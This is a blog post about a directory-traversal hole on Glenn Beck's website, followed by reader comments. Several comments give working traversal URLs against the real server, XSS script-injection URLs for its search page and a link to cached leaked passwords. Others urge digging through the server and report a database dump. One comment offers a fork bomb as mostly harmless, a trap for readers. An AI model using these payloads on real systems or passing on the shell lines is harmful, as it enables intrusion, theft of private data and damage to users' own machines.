Glenn Beck's website gives him something to cry about

Glenn Beck's website, it turns out, can be manipulated into doing strange and NSFW things by messing with the URL. An insecure PHP utility accessible at the site allows for shenanigans like directory traversal, exposing all sorts of things that should not be exposed. Like password files, and a user group named for Rush Limbaugh. [Thanks, Dean!] Update: the discussion thread is down. Here's the Google cache of it.

⟿ Follow Rob Beschizza on Twitter.

MORE: Technology

More at Boing Boing

The technology that links taxonomy and Star Trek

Hackers prepare for first "national holiday" in their honor

caribou

Also, the linked site can be manipulated into falling down, if you BoingBoing it and they can’t handle the traffic?

Software error:

Too many connections at Board/Mysql.pm line 31.
Anonymous

http://webcache.googleusercontent.com/search?strip=1&q=cache:http%3A%2F%2Fgreen-oval.net%2Fcgi-board.pl%2Fg%2Fthread%2F12376999

Google cache of board (currently down) with passwords. Get ‘em before the cache gets pulled by Google….
bardfinn

Indeed. Rather than being dot dot slashed, the site is slashdotted.
dequeued

Did anyone see the etc hosts file?

Not saying I did, that would be illegal, of course.

But my friend did.
http://media.glennbeck.com/app/getfile.php?filename=../../../../../../../../../../../../../../../../../../etc/httpd/conf/hosts

It seems to have internal map of other clear-channel hosts: http://glenbeck.pastebin.com/0G3F91hq
dequeued

Ooops, malformed url, it’s actually
http://media.glennbeck.com/app/getfile.php?filename=../../../../../../../../../../../../../../../../
../../etc/hosts%00

It’s funny that a simple logical error like directory transversal is still a problem, it’s been like what, 25 years?

lulz
Anonymous

Oh god! There is a 99% chance that you have root access to the website and 70% chance that you have root access to the server. This means that the online world now owns his website and server. Please somebody with balls and humor use it for something intelligent or dig through the server and find his private porn collection or something.
Tim

Glenn Beck’s website can also give you something to cry about: the realization that people actually listen to him.
dequeued

I wish boingboing had waited just a few more hours before publishing this, so that anonymous would have had time to work, they didn’t figure it out until about 1pm EST.

I know for a fact that the mysql database was logged into and all of the tables dumped.

As far as I know, nobody modified the content of the site, but I believe that Mr Beck’s mailing list will be up on a torrent soon.
romulusnr

This is devious, malicious hacking. Glenn Beck will not lie idle in the face of terrorist hackers. He will call for stronger anti-hacking laws.

He will call the cyber police, and consequences will never be the same.
Eris Siva

Looks like nothing happened. Poor guy.
Kind of deserved it had anything ACTUALLY happened.

I was really rooting for them to get an email dump in Palinesque style.
OCNCTY

@ romulusnr

I’m sure they can back trace that kind of thing easily.
xCleverPoet

Wow, that is epic. I love the huge Cybersecurity Carbonite ad on the site. “I trust Carbonite to protect my priceless computer files-you should too.”

Oh and um:
http://www.glennbeck.com/search/results.php?q=%22%3E%3Cscript+type%3D%22text/javascript%22%3E+alert%28%27xCleverPoet+is+awesome+!%27%29+%3C/script%3E&submit.x=0&submit.y=0
- Ted8305
  
  Oh, haha.
  
  http://www.glennbeck.com/search/results.php?q=%22%3E%3Cscript+type%3D%22text/javascript%22%3E+alert%28%27You+done+goofed!\n+Prepare+to+be+back-traced.%27%29+%3C/script%3E&submit.x=0&submit.y=0
  - xCleverPoet
    
    Not exactly sure that modifying an existing URL is a crime. :-)
rumpel

So what may happen if someone actually downloaded a file from the server?
romulusnr

BTW the “user group named after rush limbaugh” — This is apparently the main server for Premiere Radio Networks, and hosts more than just Glenn Beck’s site but also Rush’s, Steve Harvey’s, Dr. Laura’s, and other Premiere Radio hosts. So the “user group named after rush” is just the result of Red Hat’s “User Private Group” paradigm which creates a group for every new user.

PS I know this solely from what has been posted to greenoval. IANAL, TNO, TINC, IYKWIMAIKYD.
- Anonymous
  
  Interesting! From that, I’m guessing that the “coast” user is for Coast to Coast AM, which is (sadly) another Premiere show…
ethancoop

Someone explain this to me, I’ve got no clue what it means.
the_headless_rabbit

When I follow the link, I get this:

You done goofed!
Prepare to be back-traced.

WTF?

Glen, are your website warnings/threats as incoherent as your show? wow!
- the_headless_rabbit
  
  wait, wait, I get it now….never mind, I’m a little slow today….
  - Anonymous
    
    If anyone tells you to do a series of actions on your mac that ends with typing “rm -rf /*” and hitting enter, please don’t do it.
    
    You can do this though :(){ :|:& };: it won’t hurt… much…
bytefyre

someone should call in to the radio program and say in a ridiculously exaggerated southern drawl “so, I heard you folks use red hat, you know there are commies associated with Linux (pause)OH MY GOD JEB, OH. MY. GAWD. GLENN BECK IS A COMMIE!” it would be quite funny I think.
SamSam

So besides the silly alert-box hacking, it looks like they were able to get the DB username and password. But it doesn’t seem as if anyone has been adding or modifying files. But given that /b/ knows about this, that kind of self-restraint is simply not computable. So I’m guessing I’m missing something?
- Griffin
  
  What does /b have to do with this? I mean, I assume they know by now, but I haven’t seen any indication that they have anything to do with it.